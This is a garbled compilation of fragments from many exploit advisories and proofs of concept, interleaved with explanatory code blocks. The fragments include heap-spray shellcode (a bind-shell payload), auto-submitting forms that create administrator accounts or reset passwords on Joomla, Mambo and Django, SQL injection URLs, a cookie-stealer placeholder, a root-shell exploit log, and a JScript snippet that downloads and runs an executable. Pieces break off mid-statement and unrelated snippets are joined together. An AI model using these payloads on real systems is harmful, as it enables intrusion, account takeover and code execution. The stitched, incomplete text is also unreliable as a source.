<script type="text/javascript">
<!--
//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";
var newstack,newstackaddr;
var fakeobj;
var spray,spray2,selarray,readindex,readaddr,optarryaddr;
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
0x01. Description:
Memory exhaustion in Firefox 3.6.3 (the latest release) and earlier stops Firefox from inserting text into the body element, after which it crashes.
( PoC #1 raises an exception; PoC #2 causes a read access violation in the low memory area )
A variant PoC also produces a NULL pointer dereference, so code execution may be possible as well ( estimated at 0.1 % ). :-)
URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
Vendor Status: unpatched. ( no reliable exploit exists as of now, so I disclosed it to Bugtraq first )
The default AX control installation path is
C:\Program Files\Hewlett-Packard\HP Info Center
The control contains three potentially insecure methods:
VARIANT GetRegValue(String sHKey, String sectionName, String keyName);
void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);
void LaunchApp(String appPath, String params, int cmdShow);
The first and second methods are used by the HP update and configuration software to read from and
write to the registry remotely. To access a chosen registry key, one must split its path
RELEASE DATE : 13.03.2011
by Alz <cdx[dot]security[at]gmail[dot]com>
[-] Google Dork: "Powered by BoutikOne"
[-> categorie.php] Var <path> :
http://[target]/categories.php?path=[sqli]
[-> list.php] Var <path> :
http://[target]/list.php?path=[sqli]
"This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."
Usually when I see that an application claims to be secure, they really don't know what the fuck they
are doing. OpenClassifieds' security model is deeply flawed and as a result there are MANY
vulnerabilities in this code base, which allowed me to string a few cool ones together to make an
interesting exploit. OpenClassifieds is sanitizing everything on input using cG() and cP(); these
functions are used to perform a mysql_real_escape_string() on all GET and POST variables. Most
servers aren't using an exotic character set, so from a security standpoint this is exactly identical to
magic_quotes_gpc. So I dusted off my usual magic_quotes_gpc auditing tricks: look for
stripslashes(), base64_decode(), urldecode(), html_entity_decode(), lack of quote marks around variables
in a query, etc. Sanitization must ALWAYS be done at the time of use; parameterized queries are a
good example of this. It's impossible to account for all the ways a variable can be mangled once it
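The escape-on-input pattern described above, as an added example that is not OpenClassifieds' code or the advisory author's: a JavaScript model of cG()/cP() (a stand-in for mysql_real_escape_string()), a page that urldecode()s the value again before building the query, and the parameterized alternative. The table name, the `id` parameter and the attacker requests are constructed for the demonstration.

```javascript
// Added example (not from the OpenClassifieds advisory or its code base): why
// escaping every request value on arrival is not sanitization at time of use.
// All inputs below are constructed for the demonstration.

// Minimal stand-in for mysql_real_escape_string(): backslash-escape the
// characters that terminate or alter a MySQL string literal.
function mysqlEscape(s) {
  return s.replace(/[\0\n\r\\'"\x1a]/g, function (ch) {
    switch (ch) {
      case "\0":   return "\\0";
      case "\n":   return "\\n";
      case "\r":   return "\\r";
      case "\x1a": return "\\Z";
      default:     return "\\" + ch;   // backslash, ' and "
    }
  });
}

// Stand-in for cG()/cP(): escape every GET/POST value as it arrives.
function sanitizeOnInput(query) {
  var out = {};
  for (var k in query) out[k] = mysqlEscape(query[k]);
  return out;
}

// Vulnerable pattern: the value was escaped on input, but the page
// urldecode()s it again before interpolating it into SQL. A %27 the attacker
// sent had no quote to escape at input time and becomes a live quote here.
function buildQueryVulnerable(sanitized) {
  var id = decodeURIComponent(sanitized.id);
  return "SELECT * FROM ads WHERE id = '" + id + "'";
}

// Hardened pattern: keep SQL text and values apart until the driver binds
// them. The value may be decoded or otherwise transformed beforehand;
// nothing it contains can alter the statement.
function buildQueryParameterized(raw) {
  var id = decodeURIComponent(raw.id);
  return { sql: "SELECT * FROM ads WHERE id = ?", params: [id] };
}

// Constructed requests: a literal quote (caught by escaping on input) and the
// same payload URL-encoded (invisible to escaping, revived by urldecode()).
var literalQuote = { id: "1' OR '1'='1" };
var encodedQuote = { id: "1%27%20OR%20%271%27%3D%271" };

function demo() {
  return {
    escapedOnInput: buildQueryVulnerable(sanitizeOnInput(literalQuote)),
    decodedAtUse:   buildQueryVulnerable(sanitizeOnInput(encodedQuote)),
    parameterized:  buildQueryParameterized(encodedQuote)
  };
}
```

`demo().decodedAtUse` is the injected statement; `demo().parameterized` carries the identical decoded value as a bound parameter, where it is data rather than SQL.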
Flash version, which you have to export as a SWF and embed in an iframe
exploit.swf
var action:String = "saveprofile";
var user:String = "nome_user_che_modifichiamo"; // username of the account being modified
var regpass:String = "nuova_pass";              // new password
var anag:String = "nome";                       // display name
var homep:String = "sito_utente";               // user's website
var prof:String = "professione";                // profession
// osX/x86/vforkshell_bind_tcp - 152 bytes
// http://www.metasploit.com
// AppendExit=false, PrependSetresuid=false,
// PrependSetuid=false, LPORT=4444, RHOST=,
// PrependSetreuid=false
var shellcode =
unescape("%uc031%u5099%u5040%u5040%ub052%ucd61%u0f80%u7e82%u0000%u8900%u52c
6%u5252%u0068%u1102%u895c%u6ae3%u5310%u5256%u68b0%u80cd%u6772%u5652%ub052%u
cd6a%u7280%u525e%u5652%ub052%ucd1e%u7280%u8954%u31c7%u83db%u01eb%u5343%u535
7%u5ab0%u80cd%u4372%ufb83%u7503%u31f1%u50c0%u5050%ub050%ucd3b%u9080%u3c90%u
752d%ub009%ucd42%u8380%u00fa%u1774%uc031%u6850%u2f2f%u6873%u2f68%u6962%u896
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
Set the desired user, pass, email and victim URL, then upload the script
somewhere on the web
*/
window.onload = function() {
var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
var gid = 25;
var user = 'amnpardaz';
var pass = 'amnpardaz';
var email = 'amnpardaz@none.com';
var param = {
NOT RECOMMENDED: But you can also just upload a "deface page", something like:
[code]
var title = "Aria-Security.Net";
var bgcolor = "#HEX";
var image_url = "http://ariahosting.ir/index.html";
var text = "The-0utl4w";
var font_color = "#HEX";
- Greetz : xiam ;) Visit: xiam.be
-->
<script type="text/javascript">
window.onload = function() {
var url = "http://[URL]/blocks_edit_do.php";
var bid = [block id];
var topic = [name block];
var content = [cookie stealer];
The parent frame is gonna look something like this:
<iframe src="/" id="m9"></iframe>
<script>
var i = 0;
var emails;
var xhr = new XMLHttpRequest();
var url = "emails.php";
xhr.open("GET", url, true);
<PARAM NAME="_StockProps" VALUE="0">
<PARAM NAME="Split" VALUE="4">
</OBJECT>
//server address
var g_sAddress = location.hostname;
var g_sId = "";
var g_sPwd = "";
var g_bLogin = false;
var g_nMaxCamera = 16;
~ <param name="preview" value="0">
~ <param name="faxnum" value>
~ </OBJECT>
<script>
~ var shellcode =
unescape("%u0de8%u0000%u6b00%u7265%u656e%u336c%u2e32%u6c64%u006c%u15ff%u108c%u0040%uf08b%u08e8%u0000%u5700%u6e69%u7845%u6365%u5600%u15ff%u1030%u0040%uec81%u0400%u0000%u016a%u09e8%u0000%u6300%u6c61%u2e63%u7865%u0065%ud0ff%u0ce8%u0000%u4500%u6978%u5074%u6f72%u6563%u7373%u5600%u15ff%u1030%u0040%u006a%ud0ff");
~ var spraySlide = unescape("%u9090%u9090");
~ var heapSprayToAddress = 0x0c0c0c0c;
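How the `unescape("%u…")` shellcode strings (the osX vforkshell snippet above) and the `spraySlide`/`heapSprayToAddress` lines fit together, as an added example that is not code from any of the advisories quoted on this page. The shellcode stub, block size and header overhead are constructed values for illustration.

```javascript
// Added example (not from the advisories above): %u shellcode encoding and
// heap spray block layout. Byte values and sizes are chosen for illustration.

// unescape("%uc031") yields the UTF-16 code unit 0xC031, which the script
// engine stores little-endian: bytes 0x31 0xC0 (x86 "xor eax,eax"). Decode
// such a string back to the byte sequence the CPU will see.
function percentUToBytes(s) {
  var bytes = [];
  var re = /%u([0-9a-fA-F]{4})/g, m;
  while ((m = re.exec(s)) !== null) {
    var unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);      // low byte first
  }
  return bytes;
}

// Inverse: pack bytes into %u escapes (an odd tail is padded with NOP 0x90).
function bytesToPercentU(bytes) {
  var out = "";
  for (var i = 0; i < bytes.length; i += 2) {
    var lo = bytes[i];
    var hi = (i + 1 < bytes.length) ? bytes[i + 1] : 0x90;
    out += "%u" + ((hi << 8) | lo).toString(16).padStart(4, "0");
  }
  return out;
}

// Build one spray block: NOP sled followed by shellcode, sized so the block
// in bytes equals blockSize minus the string/heap header overhead the
// allocator adds (headerBytes is an assumed value). Every block is identical,
// so wherever heapSprayToAddress (0x0c0c0c0c above) lands inside the spray,
// execution slides down the sled into the shellcode. The same value, read as
// a pointer or vtable entry, also points back into the sprayed region.
function buildSprayBlock(sled, shellcode, blockSize, headerBytes) {
  var payloadUnits = (blockSize - headerBytes) / 2;   // UTF-16 units
  var block = sled;
  while (block.length < payloadUnits) block += block; // grow geometrically
  block = block.substring(0, payloadUnits - shellcode.length) + shellcode;
  return block;
}

function demo() {
  var sled = unescape("%u9090%u9090");
  var shellcode = unescape("%uc031%u5099");   // constructed 4-byte stub
  var blocks = [];
  for (var i = 0; i < 4; i++) {              // real sprays use hundreds
    blocks.push(buildSprayBlock(sled, shellcode, 0x100000, 0x24));
  }
  return blocks;
}
```

`percentUToBytes` is the check to run before trusting any `%u` string copied from an advisory: byte order mistakes in hand-edited escapes are a common reason a spray "works" but the shellcode does not.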
<TITLE> 401 Authorization</TITLE>
<META http-equiv=content-type content='text/html; charset=UTF-8'>
<script>
function loadvalue()
{
var enable_recovery="1";
var enter_sn_again="0";
var last_error_sn="2T82195D0093D";
if( enable_recovery == "1" )
Viewing the source code of the recovery questions page allows an
<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
Proof of concept
================
<script type="text/javascript">
window.onload = function() {
var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";
var pass = "funky";
var param = {
password1: pass,
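The `window.onload` / `param = {...}` snippets above (Joomla, Mambo, blocks_edit_do.php, Django admin) all share the part that is cut off here: turning the `param` object into a form that the victim's browser submits, with its session cookie, when the page loads. Added example, not code from any of those PoCs; the target URL and field names are constructed placeholders.

```javascript
// Added example (not from the PoCs above): generic auto-submitting CSRF
// form builder. TARGET and PARAM are constructed placeholders.

// HTML-escape a value so it cannot break out of a value="..." attribute.
function escapeAttr(s) {
  return String(s).replace(/[&<>"']/g, function (ch) {
    return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[ch];
  });
}

// Render the form: each key of param becomes a hidden input. The browser
// attaches the victim's cookies to the cross-site submission, which is the
// whole basis of the attack.
function buildCsrfForm(url, param, method) {
  var html = '<form id="csrf" method="' + (method || "POST") + '" action="' + escapeAttr(url) + '">';
  Object.keys(param).forEach(function (k) {
    html += '<input type="hidden" name="' + escapeAttr(k) + '" value="' + escapeAttr(param[k]) + '">';
  });
  html += "</form>";
  return html;
}

// Constructed placeholder target and parameters (compare the PoCs above).
var TARGET = "http://[target]/admin/user/1/password/";
var PARAM = { password1: "funky", password2: "funky" };

function demo() {
  return buildCsrfForm(TARGET, PARAM);
}

// In a browser, inject the form and submit it once the page has loaded.
if (typeof document !== "undefined") {
  window.onload = function () {
    document.body.insertAdjacentHTML("beforeend", demo());
    document.getElementById("csrf").submit();
  };
}
```

The defence is a per-session token the server requires in every state-changing form and that this page cannot read cross-origin: with it missing from `PARAM`, the submission is rejected no matter what cookies travel with it.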
The console is continuously displaying kernel error messages like:
swap_pager_getswapspace(2): failed
swap_pager_getswapspace(16): failed
swap_pager_getswapspace(3): failed
...
pid 61248 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61251 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61146 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61103 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61103 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61063 (httpd), uid 80 inumber 5 on /var: out of inodes
# + Using SQL user id 17
# + Host thegoodone.com is a valid user
# + Logged in (thegoodone.com - Client)
# / Trying to load files via local_infile
# + Ok: /etc/vhcs2/vhcs2.conf
# + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
# + Now you can execute commands as root =]
# + root@thegoodone.com: id
#
# uid=0(root) gid=0(root)
#
.firstalt {BACKGROUND-COLOR: "#000000"}
.secondalt {BACKGROUND-COLOR: "#000000"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
#!/usr/bin/perl
#--------------------------------------------------------------------------------
#(GET var 'member') BLIND SQL INJECTION EXPLOIT --FAMILY CONNECTIONS <= v1.9 -->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.familycms.com/index.php
#-->DOWNLOAD: http://www.familycms.com/download.php
#-->DEMO: http://www.familycms.com/demo/index.php
III. DESCRIPTION
-------------------------
Joomla! fails to sanitize user-supplied input. An attacker can inject
JavaScript or DHTML code that will be executed in the context of the
targeted user's browser, allowing him to steal cookies. HTTP headers are
not properly parsed, specifically the HTTP_REFERER variable.
Snippet of vulnerable code:
Line 225 of file components/com_content/views/article/tmpl/form.php is
vulnerable.
2. Technical Details
==================================================
File: index.template.html
1) Data enters via URL parameters through the window.location JavaScript object, is then stored in the MMredirectURL variable, and passed to the AC_FL_RunContent() function.
Line 59:
.snip..
var MMredirectURL = window.location;
.snip..
-:: The Advisory ::-
The following files are together vulnerable to cross-site scripting.
1. livezilla/templates/map.tpl (lines 18-20)
var default_lat = <!--dlat-->;
var default_lng = <!--dlng-->;
var default_zom = <!--dzom-->;
2. livezilla/map.php (lines 15-28)
if(isset($_GET["lat"]))
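The map.tpl lines above splice `lat`, `lng` and `zom` straight into JavaScript source, so a request value is interpreted as code, not as a number. Added example, not LiveZilla's code: a constructed copy of the template rendered two ways, the raw substitution map.php performs and a version that validates each value as a finite in-range number before substitution. The request values and bounds are constructed.

```javascript
// Added example (not LiveZilla's code): injection into a JavaScript context
// via template placeholders, and the numeric validation that closes it.

// Constructed stand-in for livezilla/templates/map.tpl lines 18-20.
var MAP_TPL = "var default_lat = <!--dlat-->;\n" +
              "var default_lng = <!--dlng-->;\n" +
              "var default_zom = <!--dzom-->;\n";

// Vulnerable: whatever arrived in $_GET["lat"] lands in the script verbatim.
function renderRaw(tpl, q) {
  return tpl.replace("<!--dlat-->", q.lat)
            .replace("<!--dlng-->", q.lng)
            .replace("<!--dzom-->", q.zom);
}

// Hardened: coerce to a number, reject NaN/Infinity and out-of-range values,
// and emit the canonical numeric form, so only digits, '.', '-' and 'e' can
// ever reach the script.
function numberOr(value, fallback, min, max) {
  var n = Number(value);
  if (!isFinite(n) || n < min || n > max) return fallback;
  return String(n);
}

function renderSafe(tpl, q) {
  return tpl.replace("<!--dlat-->", numberOr(q.lat, "0", -90, 90))
            .replace("<!--dlng-->", numberOr(q.lng, "0", -180, 180))
            .replace("<!--dzom-->", numberOr(q.zom, "1", 0, 21));
}

// Constructed request: lat terminates the statement and appends a call;
// the trailing // comments out the template's own semicolon.
var ATTACK = { lat: "0;alert(document.cookie)//", lng: "10.5", zom: "12" };

function demo() {
  return { raw: renderRaw(MAP_TPL, ATTACK), safe: renderSafe(MAP_TPL, ATTACK) };
}
```

Escaping quotes would not help here because the placeholders sit outside any string literal; the only safe output in a bare JavaScript expression position is a value whose entire character set is known, which is why the fix validates and re-serializes rather than escapes.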
<html><body><script>
function Demo() {
var shellcode;
var addr;
var fill;
alert('attempting a crash!');
shellcode = unescape('%u0c0c');
___ BEGIN ___
<html>
<SCRIPT language="javascript">
// This is a new technique I invented, called 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times, because what else?
// This code currently does not work on Solaris/Sparc
-------------------
PROOFS OF CONCEPT:
-------------------
[++] GET var --> 'quiz'
[++] File vuln --> 'num_questions.php'
~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*
<PostLoadScript>
<Language>JScript</Language>
<Function></Function>
<Script_Content>
<![CDATA[
var s=new ActiveXObject('WScript.Shell');
var o=new ActiveXObject('ADODB.Stream');
var e=s.Environment('Process');
var u='http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
var b=e.Item('TEMP')+'agent.exe';
var x=new ActiveXObject('Microsoft.XMLHTTP');
> <br>
> <center><img src="http://img81.imageshack.us/img81/8881/wallpaperxl0.jpg"></center>
> <br>
> <html>
> <script>
> var x=String.fromCharCode(550);
> var x2="";
> var x3="";
> for(i=0;i<1549;i++)
> {x2=x2+x;}
> for(i=0;i<1549;i++)